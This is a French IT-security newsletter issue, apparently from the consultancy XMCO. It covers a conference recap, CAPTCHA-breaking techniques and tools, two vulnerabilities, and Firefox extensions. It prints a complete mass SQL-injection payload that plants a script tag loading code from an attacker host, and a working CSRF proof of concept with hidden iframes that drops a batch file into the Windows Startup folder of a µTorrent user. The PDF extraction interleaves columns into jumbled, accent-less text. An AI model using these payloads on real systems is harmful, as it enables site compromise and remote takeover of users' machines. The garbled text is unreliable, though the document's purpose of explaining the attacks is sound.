Professional Documents
Culture Documents
Les out il s /s it e s w e b du m o i s : L e s e x t e n s i o n s F i re f o x u t i l e s
Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?
Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.
Tests d'intrusion
Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
OWASP, OSSTMM, CCWAPSS
Audit de scurit
Audit technique et organisationnel de la scurit de votre Systme d'Information
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley
Veille en vulnrabilits
Suivi personnalis des vulnrabilits et correctifs affectant votre Systme d'Information
Rponse intrusion
Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware
Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets
forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent nos axes majeurs de dveloppement
pour notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de
RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands
comptes franais.
Dans l'industrie, les entreprises lentreprise sans dconnecter son SI est gale la scurit de son
voluent sans cesse pour joujou. lment le plus faible....
amliorer leurs chanes de
production. Des cahiers des Un serveur NT4 de 1999 connect
charges sont mis rgulirement sur le domaine un compte
pour obtenir des outils plus "Administrateur de domaine" et un
performants. mot de passe gal au login,
constitue ce que l'on peut appeler
En informatique, cest le contraire : trivialement l'lment le plus
les diteurs font frntiquement faible.
natre des besoins dans les
entreprises en multipliant les En l'occurrence, une des
logiciels et leurs volutions. Ainsi, difficults des entreprises consiste
il est possible de constater des aujourdhui retrouver tous ces
effets de mode voire l'achat de Dans le cadre daudits, lorsque trophes dun jour, ces outils
produits inutiles. Linutilit de ces notre attention tente de se miracles dont on nous avait
outils les conduit labandon. focaliser sur un serveur NT4 pourtant dit tant de bien...Tout en
C'est ainsi que l'on retrouve trangement prsent sur le vitant de sen faire refourguer
rgulirement des serveurs rseau, il arrive que la rponse des nouveaux...
connects sur des domaines, soit malheureusement : "c'est un
machines fantmes dont plus vieux serveur pas important, il Qui a dit que la vie ntait quun
personne ne connat vraiment le devrait tre dbranch". ternel recommencement ?
rle, les objectifs et les enjeux.
Quid de ladage cul, survendu
Certains de ces serveurs survivent Frdric Charpentier
par TOUS les commerciaux des
parfois leur gniteur, qui quittera Consultant XMCO
mmes diteurs : la scurit d'un
XMCO | Partners
Comme chaque anne, deux sujets sont traits en Les passionns et les adeptes de son blog nont certes
parallle dans deux salles diffrentes. Nous vous rien appris de nouveau en assistant cette
proposerons seulement le rsum des prsentations prsentation. Cependant, les autres ont pu dcouvrir
auxquelles nous avons assist. les nombreux problmes dont souffre la partie cliente
du modle client/serveur, applique aussi bien aux
Premire journe navigateurs Internet et aux ordinateurs eux-mmes
Client Side Security considrs comme des clients dun rseau.
INFO...
La fibre optique galement sur la sellette
Bad Sushi
Spam Evolution :
Webographie http://www.blackhat.com/presentations/bh-europe-08/
Jakhar/Whitepaper/bh-eu-08-jakhar-WP.pdf
[1] Client-side Security :
http://www.gnucitizen.org/ Malware on the Net - Behind the scene : :http://
http://www.blackhat.com/presentations/bh-europe-08/ www.blackhat.com/presentations/bh-europe-08/Amit/
Petkov/Whitepaper/bh-eu-08-petkov-WP.pdf Whitepaper/bh-eu-08-amit-WP.pdf
http://www.blackhat.com/presentations/bh-europe-08/ http://www.blackhat.com/presentations/bh-europe-08/
Petkov/Presentation/bh-eu-08-petkov.pdf Amit/Presentation/bh-eu-08-amit.pdf
Thumann/Presentation/bh-eu-08-thumann.pdf
XMCO | Partners
Onze annes aprs son invention, les algorithmes de Le CAPTCHA de Microsoft Live Hotmail, rput comme
gnration se sont amliors et diversifis (avec lun des plus robustes, a t rcemment exploit par un
lapparition de captcha audio) afin de contrer les malware (voir la partie dans la suite de larticle). Deux
attaques des pirates. mois auparavant, ctait GMail qui tait la cible
Le CAPTCHA visuel reste le plus utilis, mais son dattaques.
efficacit varie dun algorithme un autre.
Les attaques se dveloppent de plus en plus et leur
Certains CAPTCHA sont donc plus simples casser efficacit ne cesse daugmenter notamment grce au
que dautres. partage et la mise disposition de code source. Ces
attaques ne ncessitent plus dordinateurs puissants.
Les CAPTCHA actuellement utiliss ont tous t casss Les algorithmes dvelopps peuvent prsent casser
avec des taux de russite varis. Cependant, un nimporte quel CAPTCHA en quelques secondes.
algorithme de dcodage ne doit pas tre jug quen
fonction de son pourcentage de russite. Cependant, certains CAPTCHA ne sont pas forcment
vidents, mme pour ltre humain (ci-dessous 2rV2prn
ou 2rV2pm).
WWW.XMCOPARTNERS.COM
La mthode manuelle
De nombreuses annonces sur Internet rmunrent ce Le schma ci-dessus prsente cette technique.
type de travail.
http://securitydot.net/vuln/exploits/
vulnerabilities/articles/24699/
vuln.html
WWW.XMCOPARTNERS.COM
INFO...
CAPTCHA KILLER et lextension Firefox...
- Identification de la lettre contenue dans chaque
segment. Le site CAPTCHA killer propose mme un
plugin Firefox. Ce dernier permet en un
clic droit denvoyer le CAPTCHA vers le
serveur qui se chargera via la mthode de
248e2d reconnaissance de caractre de renvoyer
lutilisateur la correspondance. Lors de
nos tests, le taux de russite sest
Des algorithmes permettent ainsi dautomatiser cette lev 80% pour le captcha de Yahoo mais
tche fastidieuse. le temps de traitement tait assez long
La plupart sont payants et se vendent entre 3000$ et (de 25 secondes 4 minutes).
5000$.
Webographie :
Analyse Captcha :
http://www.w3.org/2004/Talks/0319-csun-m3m/
http://sam.zoy.org/pwntcha/
http://homepages.cs.ncl.ac.uk/jeff.yan/msn_draft.pdf
Cependant, des chercheurs dveloppent ds http://ocr-research.org.ua/index.html
prsent des algorithmes afin de casser ces systmes,
bass sur la reconnaissance de force et de textures. Reconnaissance de formes et de textures : http://
www.cs.berkeley.edu/~fowlkes/project/boundary/
index.html
Reconnaissance de caractres :
http://www.lafdc.com/soft/ocr163.rar
h t t p : / / w w w. b r a i n s - n - b r a w n . c o m / d e f a u l t . a s p x ?
vDir=aicaptcha
Analyse de malwares :
http://securitylabs.websense.com/content/Blogs/
2919.aspx
http://securitylabs.websense.com/content/Blogs/
3063.aspx
http://blog.wintercore.com/?p=11#more-11
WWW.XMCOPARTNERS.COM
http://www.cs.berkeley.edu/~fowlkes/project/boundary/
pb/index.html
http://www.cs.berkeley.edu/~fowlkes/project/boundary/
index.html
Dcriptage....
XMCO | Partners
CODE
scurit. Depuis deux trois semaines, des milliers
d'applications web ont t attaques par un groupe de
pirates. En effet, prs de 500 000 pages web dont
notamment des sites gouvernementaux (United
Nations, UK Government, US Department of Homeland
DECLARE @T varchar(255),@C varchar(255)
Security) ont t attaqus.
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects
Les pirates ont rutilis la mme technique d'attaque
a,syscolumns b where
qu'il y a plusieurs mois savoir une injection SQL. Un
a.id=b.id and a.xtype='u' and
outil dvelopp cet effet leur a permis de rechercher
(b.xtype=99 or b.xtype=35 or b.xtype=231 or
les pages ASP et ASPX contenant des valeurs
b.xtype=167)
dynamiques telles que des identifiants d'articles ou de
OPEN
produit (article=XXX, productid=XXX) puis tente
WWW.XMCOPARTNERS.COM
Table_Cursor FETCH NEXT FROM Table_Cursor
d'injecter une requte SQL malicieuse (prsente en
INTO @T,@C
partie ci-contre).
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C
Cette dernire tente d'identifier tous les champs texte
+']=rtrim(convert(varchar,['+@C+']))+
de la base de donnes sous-jaente puis d'insrer dans
''<script src=http://evilsite.com/1.js></script>''')
les codes sources des pages web une iframe pointant
vers des sites malicieux tels ques nmidahena.com,
FETCH NEXT FROM Table_Cursor INTO @T,@C
aspder.com ou nihaorr1.com.
END
CLOSE Table_Cursor
Ds qu'un internaute visite une des pages infectes, DEALLOCATE Table_Cursor;
son navigateur est alors redirig vers un site web
CP YY WW PP XXX (CC)
WWW.XMCOPARTNERS.COM
CP 05 33 JT UYQ (25)
CODE
Ce type dattaque est gnralement utilis pour
excuter certaines requtes web avec la session de la
victime mais rares sont les vulnrabilits de ce type
qui permettent de compromettre totalement la
machine cible.
<html>
<body>
Cette faille de scurit affecte le logiciel Torrent (client
<p>Poc XMCO Torrent web ui</p>
BitTorrent ultra lger). Ce protocole pair pair (p2p)
permet de transfrer des donnes entre utilisateurs.
<iframe src="http://127.0.0.1:37651/
Ce logiciel particulirement utilis sur Internet est donc
gui/?
vulnrable une attaque de type CSRF. La simple
action=setsetting&s=dir_completed_down
visite dune page web malicieuse permet au pirate de
load_flag&v=1" width="0" height="0"
reconfigurer le logiciel et de prendre le contrle de la
frameborder="0"></iframe>
machine de la victime.
<iframe src="http://127.0.0.1:37651/
gui/?
Le problme en question provient de lextension web
action=setsetting&s=dir_completed_down
UI du client Torrent qui installe un serveur web sur la
load&v=C:\Documents%20and%20Settings
machine locale.
\All%20Users\Start%20Menu\Programs
\Startup" width="0" height="0"
Afin dexploiter pleinement la vulnrabilit Torrent, trois
frameborder="0"></iframe>
tapes sont ncessaires (envoi de trois requtes
<iframe src="http://127.0.0.1:37651/
diffrentes).
gui/?action=add-url&s=http://
WWW.XMCOPARTNERS.COM
192.168.10.14/test/
La premire requte va autoriser (paramtre v=1) le
ex.bat.torrent"width="0" height="0"
changement de rpertoire o sont stocks les
frameborder="0"></iframe>
tlchargements termins
(dir_completed_download_flag).
</body>
</html>
h t t p : / / 1 2 7 . 0 . 0 . 1 : 3 7 6 5 1 / g u i / ?
action=setsetting&s=dir_completed_download_flag&v=
1
noter: pour que cette attaque soit totalement
La deuxime requte va dfinir un emplacement de transparente pour lutilisateur, ce dernier doit au
destination des fichiers tlchargs. Nous allons ici pralable stre authentifi sur le serveur web. Dans le
choisir le rpertoire contenant les programmes lancs cas contraire, un formulaire dauthentification
au dmarrage de Windows. apparatra.
XMCO | Partners
Aprs avoir prsent de nombreux outils libres, nous vous proposons pour les prochains numros, des
extensions Firefox. Ces dernires vous permettront dexploiter pleinement les possibilits du navigateur de
Mozilla.
BugMeNot : permet de remplir automatiquement les formulaires dauthentification sans avoir senregistrer
sur le site visit.
Switch Proxy : permet de changer rapidement le proxy utilis par votre navigateur.
BugMeNot
Remplissage de formulaire
Utilit
Type Utilitaire
Description Le site web Bugmenot (prsent dans le N18 de lActuScu)
regroupe un grand nombre didentifiants pour la plupart des sites
dont le contenu est uniquement rserv aux inscrits.
Capture dcran
https://addons.mozilla.org/en-US/firefox/addon/6349
Firebug
Debugger Web
Utilit
Capture dcran
https://addons.mozilla.org/fr/firefox/addon/1843
Avis XMCO Firebug est une de nos extensions prfres. Elle inclue notamment
un debuggeur Javascript, une console, un journal dvnements et
WWW.XMCOPARTNERS.COM
WebDevelopper
Outils pour le dveloppement web
Utilit
Tous les outils sont runis pour constituer avec Firebug la mallette
du parfait webmaster.
Capture dcran
https://addons.mozilla.org/fr/firefox/addon/60
WWW.XMCOPARTNERS.COM
Avis XMCO WebDeveloper est une extension pratique et simple utiliser. Un
menu sajoute sous la barre dadresse et vous permettra de grer
facilement le dveloppement de vos applications.
Switch Proxy
Changement de proxy
Utilit
Type Utilitaire
Description SwitchProxy est une extension simple qui a un seul but : vous
permettre de changer rapidement la configuration de votre Proxy et
de sauvegarder plusieurs configurations.
Capture dcran
https://addons.mozilla.org/fr/firefox/addon/125
Avis XMCO Switch Proxy est une extension trs pratique surtout lorsque lon
est amen travailler sur plusieurs sites diffrents. En un clic, il
est alors possible de passer dune configuration une autre sans
WWW.XMCOPARTNERS.COM
propos de lActuScu
LActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners.
Sa vocation est de fournir des prsentations claires et dtailles sur le thme de la scurit informatique, en toute
indpendance. Il sagit de notre newsletter.
Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons
que sous forme de projets forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent
nos axes majeurs de dveloppement pour notre cabinet.
Pour contacter le cabinet Xmco Partners et obtenir des informations sur notre mtier : 01 47 34 68 61.
Notre site web : http://www.xmcopartners.com/
WWW.XMCOPARTNERS.COM